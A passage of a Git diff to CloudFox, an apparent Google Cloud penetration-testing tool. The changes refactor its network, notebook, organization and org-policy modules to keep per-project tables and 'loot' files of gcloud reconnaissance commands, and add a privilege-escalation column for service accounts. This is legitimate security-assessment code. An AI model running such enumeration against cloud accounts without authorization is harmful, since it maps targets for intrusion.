"Project Name", - "Project ID", - "Name", - "Local Network", - "Peer Network", - "Peer Project", - "State", - "Import Routes", - "Export Routes", } + return body +} - var peeringsBody [][]string - for _, p := range m.Peerings { - peeringsBody = append(peeringsBody, []string{ +func (m *NetworkTopologyModule) peeringsToTableBody(peerings []VPCPeering) [][]string { + var body [][]string + for _, p := range peerings { + body = append(body, []string{ m.GetProjectName(p.ProjectID), p.ProjectID, p.Name, @@ -719,44 +859,19 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal boolToYesNo(p.ImportCustomRoute), boolToYesNo(p.ExportCustomRoute), }) - - // Add peering commands to loot - m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( - "## VPC Peering: %s (Project: %s)\n"+ - "# Local: %s -> Peer: %s (project: %s)\n"+ - "# List peerings:\n"+ - "gcloud compute networks peerings list --project=%s\n\n"+ - "# List peering routes (incoming):\n"+ - "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=INCOMING\n\n"+ - "# List peering routes (outgoing):\n"+ - "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=OUTGOING\n\n", - p.Name, p.ProjectID, - m.extractNetworkName(p.Network), m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, - p.ProjectID, - p.Name, p.ProjectID, m.extractNetworkName(p.Network), - p.Name, p.ProjectID, m.extractNetworkName(p.Network), - ) - } - - // Cloud NAT table - natHeader := []string{ - "Project Name", - "Project ID", - "Name", - "Region", - "Network", - "NAT IPs", - "Logging", } + return body +} - var natBody [][]string - for _, nat := range m.NATs { +func (m *NetworkTopologyModule) natsToTableBody(nats []CloudNATConfig) [][]string { + var body [][]string + for _, nat := range nats { natIPs := strings.Join(nat.NATIPAddresses, ", ") if natIPs == "" { natIPs = "AUTO" } - natBody = append(natBody, []string{ + body = append(body, []string{ m.GetProjectName(nat.ProjectID), nat.ProjectID, nat.Name, @@ -765,91 +880,203 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal natIPs, boolToYesNo(nat.EnableLogging), }) + } + return body +} - // Add NAT commands to loot - m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( - "## Cloud NAT: %s (Project: %s, Region: %s)\n"+ - "# Describe router with NAT config:\n"+ - "gcloud compute routers describe ROUTER_NAME --region=%s --project=%s\n\n"+ - "# List NAT mappings:\n"+ - "gcloud compute routers get-nat-mapping-info ROUTER_NAME --region=%s --project=%s\n\n", - nat.Name, nat.ProjectID, nat.Region, - nat.Region, nat.ProjectID, - nat.Region, nat.ProjectID, - ) - } - - // Add Shared VPC commands to loot - for hostProject, config := range m.SharedVPCs { - m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( - "## Shared VPC Host: %s\n"+ - "# Service Projects: %v\n"+ - "# List Shared VPC resources:\n"+ - "gcloud compute shared-vpc list-associated-resources %s\n\n"+ - "# Get host project for service project:\n"+ - "gcloud compute shared-vpc get-host-project SERVICE_PROJECT_ID\n\n"+ - "# List usable subnets for service project:\n"+ - "gcloud compute networks subnets list-usable --project=%s\n\n", - hostProject, - config.ServiceProjects, - hostProject, - hostProject, - ) - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *NetworkTopologyModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if networks, ok := m.ProjectNetworks[projectID]; ok && len(networks) > 0 { + sort.Slice(networks, func(i, j int) bool { + return networks[i].Name < networks[j].Name + }) + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(networks), + }) + for _, n := range networks { + m.addNetworkToLoot(projectID, n) + } + } + + if subnets, ok := m.ProjectSubnets[projectID]; ok && len(subnets) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(subnets), + }) + for _, s := range subnets { + m.addSubnetToLoot(projectID, s) + } + } + + if peerings, ok := m.ProjectPeerings[projectID]; ok && len(peerings) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(peerings), + }) + for _, p := range peerings { + m.addPeeringToLoot(projectID, p) + } + } + + if nats, ok := m.ProjectNATs[projectID]; ok && len(nats) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloud-nat", + Header: m.getNATHeader(), + Body: m.natsToTableBody(nats), + }) + for _, nat := range nats { + m.addNATToLoot(projectID, nat) } } - // Build tables - tables := []internal.TableFile{ - { + // Add Shared VPC loot if this is a host project + if config, ok := m.SharedVPCs[projectID]; ok { + m.addSharedVPCToLoot(projectID, config) + } + + return tableFiles +} + +func (m *NetworkTopologyModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectNetworks { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectSubnets { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectPeerings { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectNATs { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = NetworkTopologyOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } +} + +func (m *NetworkTopologyModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allNATs := m.getAllNATs() + + sort.Slice(allNetworks, func(i, j int) bool { + if allNetworks[i].ProjectID != allNetworks[j].ProjectID { + return allNetworks[i].ProjectID < allNetworks[j].ProjectID + } + return allNetworks[i].Name < allNetworks[j].Name + }) + + var tables []internal.TableFile + + if len(allNetworks) > 0 { + tables = append(tables, internal.TableFile{ Name: "vpc-networks", - Header: networksHeader, - Body: networksBody, - }, + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(allNetworks), + }) } - if len(subnetsBody) > 0 { + if len(allSubnets) > 0 { tables = append(tables, internal.TableFile{ Name: "subnets", - Header: subnetsHeader, - Body: subnetsBody, + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(allSubnets), }) } - if len(peeringsBody) > 0 { + if len(allPeerings) > 0 { tables = append(tables, internal.TableFile{ Name: "vpc-peerings", - Header: peeringsHeader, - Body: peeringsBody, + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(allPeerings), }) } - if len(natBody) > 0 { + if len(allNATs) > 0 { tables = append(tables, internal.TableFile{ Name: "cloud-nat", - Header: natHeader, - Body: natBody, + Header: m.getNATHeader(), + Body: m.natsToTableBody(allNATs), }) } + // Populate loot for flat output + for projectID, networks := range m.ProjectNetworks { + for _, n := range networks { + m.addNetworkToLoot(projectID, n) + } + } + for projectID, subnets := range m.ProjectSubnets { + for _, s := range subnets { + m.addSubnetToLoot(projectID, s) + } + } + for projectID, peerings := range m.ProjectPeerings { + for _, p := range peerings { + m.addPeeringToLoot(projectID, p) + } + } + for projectID, nats := range m.ProjectNATs { + for _, nat := range nats { + m.addNATToLoot(projectID, nat) + } + } + for projectID, config := range m.SharedVPCs { + m.addSharedVPCToLoot(projectID, config) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + output := NetworkTopologyOutput{ Table: tables, Loot: lootFiles, } - // Build scope names with project names scopeNames := make([]string, len(m.ProjectIDs)) for i, projectID := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(projectID) } - // Write output err := internal.HandleOutputSmart( "gcp", m.Format, diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index 4f04070a..c401314a 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -30,10 +30,11 @@ Features: type NotebooksModule struct { gcpinternal.BaseGCPModule - Instances []notebooksservice.NotebookInstanceInfo - Runtimes []notebooksservice.RuntimeInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectInstances map[string][]notebooksservice.NotebookInstanceInfo // projectID -> instances + ProjectRuntimes map[string][]notebooksservice.RuntimeInfo // projectID -> runtimes + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } type NotebooksOutput struct { @@ -51,35 +52,56 @@ func runGCPNotebooksCommand(cmd *cobra.Command, args []string) { } module := &NotebooksModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Instances: []notebooksservice.NotebookInstanceInfo{}, - Runtimes: []notebooksservice.RuntimeInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]notebooksservice.NotebookInstanceInfo), + ProjectRuntimes: make(map[string][]notebooksservice.RuntimeInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *NotebooksModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_NOTEBOOKS_MODULE_NAME, m.processProject) - if len(m.Instances) == 0 && len(m.Runtimes) == 0 { + allInstances := m.getAllInstances() + allRuntimes := m.getAllRuntimes() + + if len(allInstances) == 0 && len(allRuntimes) == 0 { logger.InfoM("No notebook instances found", globals.GCP_NOTEBOOKS_MODULE_NAME) return } publicCount := 0 - for _, instance := range m.Instances { + for _, instance := range allInstances { if !instance.NoPublicIP { publicCount++ } } logger.SuccessM(fmt.Sprintf("Found %d notebook instance(s) (%d with public IP), %d runtime(s)", - len(m.Instances), publicCount, len(m.Runtimes)), globals.GCP_NOTEBOOKS_MODULE_NAME) + len(allInstances), publicCount, len(allRuntimes)), globals.GCP_NOTEBOOKS_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *NotebooksModule) getAllInstances() []notebooksservice.NotebookInstanceInfo { + var all []notebooksservice.NotebookInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *NotebooksModule) getAllRuntimes() []notebooksservice.RuntimeInfo { + var all []notebooksservice.RuntimeInfo + for _, runtimes := range m.ProjectRuntimes { + all = append(all, runtimes...) + } + return all +} + func (m *NotebooksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating notebooks in project: %s", projectID), globals.GCP_NOTEBOOKS_MODULE_NAME) @@ -87,6 +109,17 @@ func (m *NotebooksModule) processProject(ctx context.Context, projectID string, svc := notebooksservice.New() + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["notebooks-commands"] = &internal.LootFile{ + Name: "notebooks-commands", + Contents: "# Notebook Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + // Get instances instances, err := svc.ListInstances(projectID) if err != nil { @@ -95,9 +128,9 @@ func (m *NotebooksModule) processProject(ctx context.Context, projectID string, fmt.Sprintf("Could not list notebook instances in project %s", projectID)) } else { m.mu.Lock() - m.Instances = append(m.Instances, instances...) + m.ProjectInstances[projectID] = instances for _, instance := range instances { - m.addToLoot(instance) + m.addToLoot(projectID, instance) } m.mu.Unlock() } @@ -106,20 +139,17 @@ func (m *NotebooksModule) processProject(ctx context.Context, projectID string, runtimes, err := svc.ListRuntimes(projectID) if err == nil { m.mu.Lock() - m.Runtimes = append(m.Runtimes, runtimes...) + m.ProjectRuntimes[projectID] = runtimes m.mu.Unlock() } } -func (m *NotebooksModule) initializeLootFiles() { - m.LootMap["notebooks-commands"] = &internal.LootFile{ - Name: "notebooks-commands", - Contents: "# Notebook Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *NotebooksModule) addToLoot(projectID string, instance notebooksservice.NotebookInstanceInfo) { + lootFile := m.LootMap[projectID]["notebooks-commands"] + if lootFile == nil { + return } -} - -func (m *NotebooksModule) addToLoot(instance notebooksservice.NotebookInstanceInfo) { - m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Instance: %s (Project: %s, Location: %s)\n"+ "# State: %s, Service Account: %s\n"+ "# Public IP: %s, Proxy Access: %s\n", @@ -129,11 +159,11 @@ func (m *NotebooksModule) addToLoot(instance notebooksservice.NotebookInstanceIn ) if instance.ProxyUri != "" { - m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Proxy URI: %s\n", instance.ProxyUri) } - m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe instance:\n"+ "gcloud notebooks instances describe %s --location=%s --project=%s\n\n"+ "# Get JupyterLab proxy URL:\n"+ @@ -150,128 +180,239 @@ func (m *NotebooksModule) addToLoot(instance notebooksservice.NotebookInstanceIn } func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *NotebooksModule) getInstancesHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Machine Type", + "Service Account", + "Priv Esc", + "Network", + "Subnet", + "Public IP", + "Proxy Access", + "Proxy URI", + "GPU", + "Creator", + } +} - // Instances table - if len(m.Instances) > 0 { - header := []string{ - "Project Name", - "Project ID", - "Name", - "Location", - "State", - "Machine Type", - "Service Account", - "Network", - "Subnet", - "Public IP", - "Proxy Access", - "Proxy URI", - "GPU", - "Creator", +func (m *NotebooksModule) getRuntimesHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Type", + "Machine Type", + "Service Account", + "Priv Esc", + "Network", + "Subnet", + } +} + +func (m *NotebooksModule) instancesToTableBody(instances []notebooksservice.NotebookInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + gpu := "-" + if instance.AcceleratorCount > 0 { + gpu = fmt.Sprintf("%s x%d", instance.AcceleratorType, instance.AcceleratorCount) } - var body [][]string - for _, instance := range m.Instances { - gpu := "-" - if instance.AcceleratorCount > 0 { - gpu = fmt.Sprintf("%s x%d", instance.AcceleratorType, instance.AcceleratorCount) - } - sa := instance.ServiceAccount - if sa == "" { - sa = "(default)" - } - network := instance.Network - if network == "" { - network = "-" - } - subnet := instance.Subnet - if subnet == "" { - subnet = "-" - } - proxyUri := instance.ProxyUri - if proxyUri == "" { - proxyUri = "-" - } - creator := instance.Creator - if creator == "" { - creator = "-" + sa := instance.ServiceAccount + if sa == "" { + sa = "(default)" + } + + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if sa != "(default)" && sa != "" { + privEsc = m.PrivescCache.GetPrivescSummary(sa) + } else { + privEsc = "No" } - body = append(body, []string{ - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - instance.Name, - instance.Location, - instance.State, - instance.MachineType, - sa, - network, - subnet, - boolToYesNo(!instance.NoPublicIP), - boolToYesNo(!instance.NoProxyAccess), - proxyUri, - gpu, - creator, - }) } - tables = append(tables, internal.TableFile{ - Name: "notebook-instances", - Header: header, - Body: body, + + network := instance.Network + if network == "" { + network = "-" + } + subnet := instance.Subnet + if subnet == "" { + subnet = "-" + } + proxyUri := instance.ProxyUri + if proxyUri == "" { + proxyUri = "-" + } + creator := instance.Creator + if creator == "" { + creator = "-" + } + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.State, + instance.MachineType, + sa, + privEsc, + network, + subnet, + boolToYesNo(!instance.NoPublicIP), + boolToYesNo(!instance.NoProxyAccess), + proxyUri, + gpu, + creator, }) } + return body +} - // Runtimes table - if len(m.Runtimes) > 0 { - header := []string{ - "Project Name", - "Project ID", - "Name", - "Location", - "State", - "Type", - "Machine Type", - "Service Account", - "Network", - "Subnet", +func (m *NotebooksModule) runtimesToTableBody(runtimes []notebooksservice.RuntimeInfo) [][]string { + var body [][]string + for _, runtime := range runtimes { + sa := runtime.ServiceAccount + if sa == "" { + sa = "-" } - var body [][]string - for _, runtime := range m.Runtimes { - sa := runtime.ServiceAccount - if sa == "" { - sa = "-" - } - network := runtime.Network - if network == "" { - network = "-" + + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if sa != "-" && sa != "" { + privEsc = m.PrivescCache.GetPrivescSummary(sa) + } else { + privEsc = "No" } - subnet := runtime.Subnet - if subnet == "" { - subnet = "-" + } + + network := runtime.Network + if network == "" { + network = "-" + } + subnet := runtime.Subnet + if subnet == "" { + subnet = "-" + } + body = append(body, []string{ + m.GetProjectName(runtime.ProjectID), + runtime.ProjectID, + runtime.Name, + runtime.Location, + runtime.State, + runtime.RuntimeType, + runtime.MachineType, + sa, + privEsc, + network, + subnet, + }) + } + return body +} + +func (m *NotebooksModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "notebook-instances", + Header: m.getInstancesHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + if runtimes, ok := m.ProjectRuntimes[projectID]; ok && len(runtimes) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "notebook-runtimes", + Header: m.getRuntimesHeader(), + Body: m.runtimesToTableBody(runtimes), + }) + } + + return tableFiles +} + +func (m *NotebooksModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectInstances { + projectIDs[projectID] = true + } + for projectID := range m.ProjectRuntimes { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - body = append(body, []string{ - m.GetProjectName(runtime.ProjectID), - runtime.ProjectID, - runtime.Name, - runtime.Location, - runtime.State, - runtime.RuntimeType, - runtime.MachineType, - sa, - network, - subnet, - }) } + + outputData.ProjectLevelData[projectID] = NotebooksOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) + } +} + +func (m *NotebooksModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + allRuntimes := m.getAllRuntimes() + + var tables []internal.TableFile + + if len(allInstances) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notebook-instances", + Header: m.getInstancesHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } + + if len(allRuntimes) > 0 { tables = append(tables, internal.TableFile{ Name: "notebook-runtimes", - Header: header, - Body: body, + Header: m.getRuntimesHeader(), + Body: m.runtimesToTableBody(allRuntimes), }) } var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go index be3f129a..37fcc22d 100644 --- a/gcp/commands/organizations.go +++ b/gcp/commands/organizations.go @@ -235,6 +235,14 @@ func (m *OrganizationsModule) addFolderToHierarchy(folder orgsservice.FolderInfo // Output Generation // ------------------------------ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *OrganizationsModule) buildTables() []internal.TableFile { // Organizations table orgsHeader := []string{ "Organization ID", @@ -320,14 +328,6 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L } } - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - // Build tables var tables []internal.TableFile @@ -363,6 +363,83 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L }) } + return tables +} + +func (m *OrganizationsModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *OrganizationsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // For organizations module, output at org level since it enumerates the whole hierarchy + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := OrganizationsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output location - prefer org-level, fall back to project-level + orgID := "" + + // First, try to get org ID from the hierarchy + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } else if len(m.Organizations) > 0 { + // Fall back to enumerated organizations if hierarchy not available + orgID = strings.TrimPrefix(m.Organizations[0].Name, "organizations/") + } + + // Ensure hierarchy has display names from our enumeration + // This handles the case where the hierarchy was built before we enumerated orgs + if m.Hierarchy != nil && len(m.Organizations) > 0 { + for _, org := range m.Organizations { + numericID := strings.TrimPrefix(org.Name, "organizations/") + // Update display name in hierarchy if we have a better one + for i := range m.Hierarchy.Organizations { + if m.Hierarchy.Organizations[i].ID == numericID { + if m.Hierarchy.Organizations[i].DisplayName == "" && org.DisplayName != "" { + m.Hierarchy.Organizations[i].DisplayName = org.DisplayName + } + break + } + } + } + } + + if orgID != "" { + // Place at org level + outputData.OrgLevelData[orgID] = output + } else if len(m.ProjectIDs) > 0 { + // Fall back to first project level if no org discovered + outputData.ProjectLevelData[m.ProjectIDs[0]] = output + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *OrganizationsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + output := OrganizationsOutput{ Table: tables, Loot: lootFiles, diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go index 9f9d961b..1cc9a080 100644 --- a/gcp/commands/orgpolicies.go +++ b/gcp/commands/orgpolicies.go @@ -42,9 +42,9 @@ Risk Indicators: type OrgPoliciesModule struct { gcpinternal.BaseGCPModule - Policies []orgpolicyservice.OrgPolicyInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectPolicies map[string][]orgpolicyservice.OrgPolicyInfo // projectID -> policies + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type OrgPoliciesOutput struct { @@ -62,31 +62,49 @@ func runGCPOrgPoliciesCommand(cmd *cobra.Command, args []string) { } module := &OrgPoliciesModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Policies: []orgpolicyservice.OrgPolicyInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPolicies: make(map[string][]orgpolicyservice.OrgPolicyInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *OrgPoliciesModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ORGPOLICIES_MODULE_NAME, m.processProject) - if len(m.Policies) == 0 { + allPolicies := m.getAllPolicies() + if len(allPolicies) == 0 { logger.InfoM("No organization policies found (may require orgpolicy.policies.list permission)", globals.GCP_ORGPOLICIES_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d organization policy(ies)", len(m.Policies)), globals.GCP_ORGPOLICIES_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d organization policy(ies)", len(allPolicies)), globals.GCP_ORGPOLICIES_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *OrgPoliciesModule) getAllPolicies() []orgpolicyservice.OrgPolicyInfo { + var all []orgpolicyservice.OrgPolicyInfo + for _, policies := range m.ProjectPolicies { + all = append(all, policies...) + } + return all +} + func (m *OrgPoliciesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating org policies in project: %s", projectID), globals.GCP_ORGPOLICIES_MODULE_NAME) } + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["orgpolicies-commands"] = &internal.LootFile{ + Name: "orgpolicies-commands", + Contents: "# Organization Policy Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + svc := orgpolicyservice.New() policies, err := svc.ListProjectPolicies(projectID) if err != nil { @@ -97,37 +115,34 @@ func (m *OrgPoliciesModule) processProject(ctx context.Context, projectID string } m.mu.Lock() - m.Policies = append(m.Policies, policies...) + m.ProjectPolicies[projectID] = policies for _, policy := range policies { - m.addPolicyToLoot(policy) + m.addPolicyToLoot(projectID, policy) } m.mu.Unlock() } -func (m *OrgPoliciesModule) initializeLootFiles() { - m.LootMap["orgpolicies-commands"] = &internal.LootFile{ - Name: "orgpolicies-commands", - Contents: "# Organization Policy Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *OrgPoliciesModule) addPolicyToLoot(projectID string, policy orgpolicyservice.OrgPolicyInfo) { + lootFile := m.LootMap[projectID]["orgpolicies-commands"] + if lootFile == nil { + return } -} - -func (m *OrgPoliciesModule) addPolicyToLoot(policy orgpolicyservice.OrgPolicyInfo) { // Extract short constraint name for commands constraintName := policy.Constraint if strings.HasPrefix(constraintName, "constraints/") { constraintName = strings.TrimPrefix(constraintName, "constraints/") } - m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Constraint: %s (Project: %s)\n", policy.Constraint, policy.ProjectID, ) if policy.Description != "" { - m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Description: %s\n", policy.Description) + lootFile.Contents += fmt.Sprintf("# Description: %s\n", policy.Description) } - m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Enforced: %s, AllowAll: %s, DenyAll: %s, Inherit: %s\n", boolToYesNo(policy.Enforced), boolToYesNo(policy.AllowAll), @@ -136,13 +151,13 @@ func (m *OrgPoliciesModule) addPolicyToLoot(policy orgpolicyservice.OrgPolicyInf ) if len(policy.AllowedValues) > 0 { - m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Allowed Values: %s\n", strings.Join(policy.AllowedValues, ", ")) + lootFile.Contents += fmt.Sprintf("# Allowed Values: %s\n", strings.Join(policy.AllowedValues, ", ")) } if len(policy.DeniedValues) > 0 { - m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Denied Values: %s\n", strings.Join(policy.DeniedValues, ", ")) + lootFile.Contents += fmt.Sprintf("# Denied Values: %s\n", 